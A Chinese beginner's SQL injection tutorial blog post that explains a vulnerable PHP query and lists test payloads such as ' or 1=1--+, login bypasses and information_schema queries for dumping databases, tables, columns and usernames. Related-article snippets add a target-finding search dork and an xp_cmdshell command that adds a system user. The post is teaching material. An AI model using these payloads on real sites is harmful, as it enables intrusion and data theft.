sql注入--入门篇

最新推荐文章于 2023-05-28 16:44:34 发布
最新推荐文章于 2023-05-28 16:44:34 发布
阅读量918 收藏 7
点赞数 1
分类专栏: SQL注入 文章标签: sql注入 入门
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/fuzz_nancheng/article/details/63924369
版权

这里先推荐一下适合SQL注入入门的资源:

首先,需要先学习一下SQL语句,至少知道怎么用。具体可以参考w3school

其次,需要了解各种各种数据库的结构。例如mysql数据库,有information_schema库,库里有schemata,tables,columns表,表里还有各种字段。

一些关键点(以mysql数据库为例子):

连接函数

concat(str1,str2,...)——没有分隔符地连接字符串
concat_ws(separator,str1,str2,...)——含有分隔符地连接字符串
group_concat(str1,str2,...)——连接一个组的所有字符串,并以逗号分隔每一条数据

数据库结构

库:information_schema
表:schemata,tables,columns    
字段:table_schema,tabe_name,column

常用函数

version()-MySQL版本 
user()-数据库用户名 
database()-数据库名 
@@datadir-数据库路径 
@@version_compile_os-操作系统版本

逻辑运算

and,or

接下来是原理,也是SQL注入最核心的地方。
原理:当参数可控的情况下,将sql语句注入到参数(符合语法规则),让服务器端执行一些我们想要执行的语句,返回数据库的私密信息。

下面代码是一个简单的SQL注入点:

id=_GET['id'];
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";

可以看到,当输入的参数$id为代码的时候就会使得sql语句改变原来的逻辑。

SQL注入分类:

联合查询的类型
基于错误的SQL注入
基于布尔SQL盲注
基于时间的SQL盲注
基于报错的SQL盲注
堆查询注射
二次注入
cookie注入
referer注入
宽字节注入
......

一般的注入过程:
1.寻找注入点
一般的SQL注入测试语句:

PS: --可以用#替换,url提交过程中url编码后的#为%23

or 1=1--+
'or 1=1--+
"or 1=1--+
)or 1=1--+
')or 1=1--+
") or 1=1--+
"))or 1=1--+

get注入:

添加单引号报错
and 1=1正常 and 1=2不正常 
10-0正常 10-1不正常(参数为整型)

post注入:

基本与get类似
万能密码使用上述测试语句

搜索框注入:

1 搜索keywords',如果出错的话,有90%的可能性存在漏洞;
2 搜索keywords%,如果同样出错的话,就有95%的可能性存在漏洞;
3 搜索keywords%'and 1=1 and '%'='(这个语句的功能就相当于普通SQL注入的 and 1=1)
4 搜索keywords%'and 1=2 and '%'='(这个语句的功能就相当于普通SQL注入的 and 1=2)
5 根据两次的返回情况来判断是不是搜索型文本框注入了

2.爆数据库

爆当前数据库:
select database()
爆单个数据库:
select schema_name from information_schema.schemata limit n,1
爆所有数据库:
select group_concat(schema_name) from information_schema.schemata

3.爆数据表(此时的库以security为例)

爆某库单个表:
select table_name from information_schema.tables where table_schema='security' limit n,1
爆某库所有表:
select group_concat(table_name) from information_schema.tables where table_schema='security'

4.爆字段(此时的表以users为例)

爆某个表单个字段:
select column_name from information_schema.columns where table_name='users' limit n,1
爆某个表所有字段:
select group_concat(column_name) from information_schema.columns where table_name='users'

5.爆数据项(以username为例)

select group_concat(username) from users
「已注销」
关注
  • 1
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
SQL注入-入门篇
BoomJane的专栏
08-10 1万+
第一步,先把IE菜单=>工具=>Internet选项=>高级=>显示友好 HTTP 错误信息前面的勾去掉。 否则,不论服务器返回什么错误,IE都只显示为HTTP 500服务器错误,不能获得更多的提示信息。 【一、SQL注入原理】 1.锁定目标 在浏览器的搜索框中输入:公司 inurl asp?id=,然后点击搜索按钮,会列出所有asp相关的网站信息,从中选取一个 这里我们选取http:/
实战初级SQL注入-access篇
edegod的博客
02-19 4589
这是我的第一篇文章,如有不好的地方还请多多担待,才开始接触网络安全,小白一个。学习过程中遇到了非常多的问题,过程中发现很少有关于纯新手的文章,入门很难,所以我写了这篇文章,带大家能够更简单的理解网络世界。话简单说,接下来是我看小迪渗透视频所学到的,我整理了一下,一步一步很详细,基本谁都能看懂。搭建虚拟机,安装镜像就跳过了,网上也说的很明白,至于特定的软件安装,百度也有详细的解决办法。SQL注入个人...
sql注入---入门到进阶
热门推荐
春日野穹
10-24 3万+
目录导航 sql注入的原理 sql注入的条件 sql注入的危害 sql注入的分类、验证及利用方式 sql数值型注入 sql注入的原理: 概述:针对SQL注入的攻击行为可描述为通过用户可控参数中注入SQL语法,破坏原有SQL结构,达到编写程序时意料之外结果的攻击行为,其本质就是对于输入检查不充分,导致SQL语句将用户提交的非法数据当作语句的一部分来执行,sql注入产生的原理有以下几个方面 程序编...
[第一章 web入门]SQL注入-1
陈艺秋的博客
05-28 1255
拿到题目是一篇日记,是GET型请求方式,我们可以直接在url栏中注入数据。页面无回显,判断为字符型注入,闭合符应该就是单引号。判断注入类型,页面有回显所以不是整型注入。查询flag表中的字段名。无回显,说明有三个字段。爆出表名和数据库名称。
CISP-PTE SQL注入 入门篇
beirry的博客
12-21 1451
经过上一篇的文章,相信大家也初步掌握了sql语句,现在我们就来学习SQL注入的攻击语句。 mysql在版本5之前,只能通过盲注来获取数据,mysql在版本5以后,可以获取信息的方式就很多了,因为含有默认的库:information_schema,这个库存储着mysql的结构信息。我们通过这个库来获取数据表名,字段名。 判断查询类型 select * from users where id=1 这个语句意思是查询users表中id为1的所有字段,当我把这个id的字段挖空,让这个字段可以用户自己输入。那么攻击
SQL注入漏洞全接触--入门篇
iteye_7130的博客
04-29 181
SQL注入漏洞全接触--入门篇 博客分类:SQL注入 SQLASPIIS应用服务器IE 随着B/S模式应用开发的发展,使用这种模式编写应用程序的程序员也越来越多。但是由于这个行业的入门门槛不高,程序员的水平及经验也参差不齐,相当大一部分程序员在编写代码的时候,没有对用户输入数据的合法性进行判断,使应用程序存在安全隐患。用户可以提交一段数据库查询代码,根据程序返回的结果,获得某些他想...
SQL注入-高级篇
BoomJane的专栏
08-23 2500
【一、利用系统表注入SQLServer数据库】 SQLServer是一个功能强大的数据库系统,与操作系统也有紧密的联系,这给开发者带来了很大的方便,但另一方面,也为注入者提供了一个跳板,我们先来看看几个具体的例子: ① http://Site/url.asp?id=1;exec master..xp_cmdshell “net user name password /add”-- 分
CTFSHOW WEB入门——sql注入
Chur的博客
07-22 4244
ctfshow 靶场 web入门 sql注入系列
mysql order by sql注入_萌新的手工sql注入入门--mysql(普通sql注入篇)
weixin_33613571的博客
01-21 416
sql注入主要分为普通的sql注入,还有盲注这一篇主要是记录普通的sql注入sql注入的主要流程:1.寻找注入点/判断该表单是否可注入:主要运用的方法是,构造错误的语句(在正常输入的后面加上如单引号等敏感符号)如:1’ ,1#等同时,注入类型分为三类,数字类,字符类,还有如like%%等搜索函数根据返回的结果进行判断是普通的sql注入还是盲注。2.找到注入点之后,利用order by 猜解字段个数...
T-SQL篇如何防止SQL注入的解决方法
01-19
怎么进行SQL注入 关于怎么进行SQL注入,网上已经有很多文章详细介绍过了,可以参考博友滴答的雨的博文 《SQL注入攻防入门详解》,亲测有效。当执行完文中的5、6、7三步的时候,你会发现服务器上的安全保护措施都已是...
sql注入学习入门篇
12-16
SQL注入学习入门篇 SQL注入是一种常见的网络攻击手段,它能够让攻击者获取到网站的敏感信息,从而导致严重的安全隐患。随着B/S模式应用开发的发展,使用这种模式编写应用程序的程序员也越来越多。但是由于这个行业...
SQL注入天书-ASP注入漏洞全接触.pdf
07-09
入门篇中,作者阐述了SQL注入的基本原理。通过向URL参数中插入SQL代码,攻击者可以试图改变原有的SQL查询,从而获取未授权的数据。例如,一个简单的注入尝试可能是将URL中的`id`参数改为`id=49' or '1'='1`,这可能...
0729信息技术服务知识12.pdf
07-30
0729信息技术服务知识12.pdf
2024贵州省河流水系矢量图层shp数据最新版下载-带python代码
07-30
2024贵州省河流水系矢量图层shp数据下载-包含水系线和水系面数据,几千上万条数据,非常细化,附带shp转geojson的python代码
【SCI顶级】鱼鹰算法OOA-CNN-LSTM-Multihead-Attention温度预测【含源码 5769期】.zip
07-30
CSDN海神之光上传的全部代码均可运行,亲测可用,直接替换数据即可,适合小白; 1、代码压缩包内容 主函数:Main .m; 数据; 调用函数:其他m文件;无需运行 运行结果效果图; 2、代码运行版本 Matlab 2019b;若运行有误,根据提示修改;若不会,可私信博主; 3、运行操作步骤 步骤一:将所有文件放到Matlab的当前文件夹中; 步骤二:双击打开除Main.m的其他m文件; 步骤三:点击运行,等程序运行完得到结果; 4、仿真咨询 如需其他服务,可私信博主或扫描博主博客文章底部QQ名片; 4.1 CSDN博客或资源的完整代码提供 4.2 期刊或参考文献复现 4.3 Matlab程序定制 4.4 科研合作 智能优化算法-CNN-LSTM-Mutilhead-Attention回归预测系列程序定制或科研合作方向: 4.4.1 遗传算法GA/蚁群算法ACO-CNN-LSTM-Mutilhead-Attention回归预测 4.4.2 粒子群算法PSO/蛙跳算法SFLA-CNN-LSTM-Mutilhead-Attention回归预测 4.4.3 灰狼算法GWO/狼群算法WPA-CNN-LSTM-Mutilhead-Attention回归预测 4.4.4 鲸鱼算法WOA/麻雀算法SSA-CNN-LSTM-Mutilhead-Attention回归预测 4.4.5 萤火虫算法FA/差分算法DE-CNN-LSTM-Mutilhead-Attention回归预测
【SCI顶级】遗传算法GA-CNN-LSTM-Multihead-Attention温度预测【含源码 5766期】.zip
07-30
CSDN海神之光上传的全部代码均可运行,亲测可用,直接替换数据即可,适合小白; 1、代码压缩包内容 主函数:Main .m; 数据; 调用函数:其他m文件;无需运行 运行结果效果图; 2、代码运行版本 Matlab 2019b;若运行有误,根据提示修改;若不会,可私信博主; 3、运行操作步骤 步骤一:将所有文件放到Matlab的当前文件夹中; 步骤二:双击打开除Main.m的其他m文件; 步骤三:点击运行,等程序运行完得到结果; 4、仿真咨询 如需其他服务,可私信博主或扫描博主博客文章底部QQ名片; 4.1 CSDN博客或资源的完整代码提供 4.2 期刊或参考文献复现 4.3 Matlab程序定制 4.4 科研合作 智能优化算法-CNN-LSTM-Mutilhead-Attention回归预测系列程序定制或科研合作方向: 4.4.1 遗传算法GA/蚁群算法ACO-CNN-LSTM-Mutilhead-Attention回归预测 4.4.2 粒子群算法PSO/蛙跳算法SFLA-CNN-LSTM-Mutilhead-Attention回归预测 4.4.3 灰狼算法GWO/狼群算法WPA-CNN-LSTM-Mutilhead-Attention回归预测 4.4.4 鲸鱼算法WOA/麻雀算法SSA-CNN-LSTM-Mutilhead-Attention回归预测 4.4.5 萤火虫算法FA/差分算法DE-CNN-LSTM-Mutilhead-Attention回归预测
时尚个性四页.zip
最新发布
07-30
【简历模板】工作总结、商业计划书、述职报告、读书分享、家长会、主题班会、端午节、期末、夏至、中国风、卡通、小清新、岗位竞聘、公司介绍、读书分享、安全教育、文明礼仪、儿童故事、绘本、防溺水、夏季安全、科技风、商务、炫酷、企业培训、自我介绍、产品介绍、师德师风、班主任培训、神话故事、巴黎奥运会、世界献血者日、防范非法集资、3D快闪、毛玻璃、人工智能等等各种样式的ppt素材风格。 设计模板、图片素材、PPT模板、视频素材、办公文档、小报模板、表格模板、音效配乐、字体库。 广告设计:海报,易拉宝,展板,宣传单,宣传栏,画册,邀请函,优惠券,贺卡,文化墙,标语,制度,名片,舞台背景,广告牌,证书,明信片,菜单,折页,封面,节目单,门头,美陈,拱门,展架等。 电商设计:主图,直通车,详情页,PC端首页,移动端首页,钻展,优惠券,促销标签,店招,店铺公告等。 图片素材:PNG素材,背景素材,矢量素材,插画,元素,艺术字,UI设计等。 视频素材:AE模板,会声会影,PR模板,视频背景,实拍短片,音效配乐。 办公文档:工作汇报,毕业答辩,企业介绍,总结计划,教学课件,求职简历等PPT/WORD模板。
SQL注入教程:从入门到高级
教程的入门篇首先介绍了如何开启浏览器的错误信息显示,以便在测试过程中获取更详细的错误反馈。接着,通过一个实际的示例网站`www.mytest.com`,展示了如何通过在URL中添加特殊字符引发SQL注入。这一部分详细解释了...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值